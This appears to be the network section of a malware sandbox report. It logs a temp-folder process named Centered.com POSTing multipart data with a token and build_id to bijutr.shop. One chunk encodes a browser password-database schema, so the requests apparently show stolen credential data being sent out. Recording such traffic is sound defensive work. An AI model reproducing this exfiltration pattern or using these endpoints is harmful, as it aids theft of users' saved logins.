                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:12 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      12192.168.2.749805188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:16 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----SR1N7YM7GVAAIE3O8Q90
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 505
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:16 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 4e 37 59 4d 37 47 56 41 41 49 45 33 4f 38 51 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------SR1N7YM7GVAAIE3O8Q90Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------SR1N7YM7GVAAIE3O8Q90Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------SR1N7YM7GVAAIE3O8Q90Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      13192.168.2.749806188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----7YMYCBSR1N7YUAS2V3OZ
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 213453
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 37 59 4d 59 43 42 53 52 31 4e 37 59 55 41 53 32 56 33 4f 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------7YMYCBSR1N7YUAS2V3OZContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------7YMYCBSR1N7YUAS2V3OZContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------7YMYCBSR1N7YUAS2V3OZCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:17 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:19 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      14192.168.2.749808188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:19 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----79H47YUK6F3EU3O890R1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 55081
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:19 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 39 48 34 37 59 55 4b 36 46 33 45 55 33 4f 38 39 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 34 37 59 55 4b 36 46 33 45 55 33 4f 38 39 30 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 34 37 59 55 4b 36 46 33 45 55 33 4f 38 39 30 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------79H47YUK6F3EU3O890R1Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------79H47YUK6F3EU3O890R1Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------79H47YUK6F3EU3O890R1Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:19 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:19 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:19 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
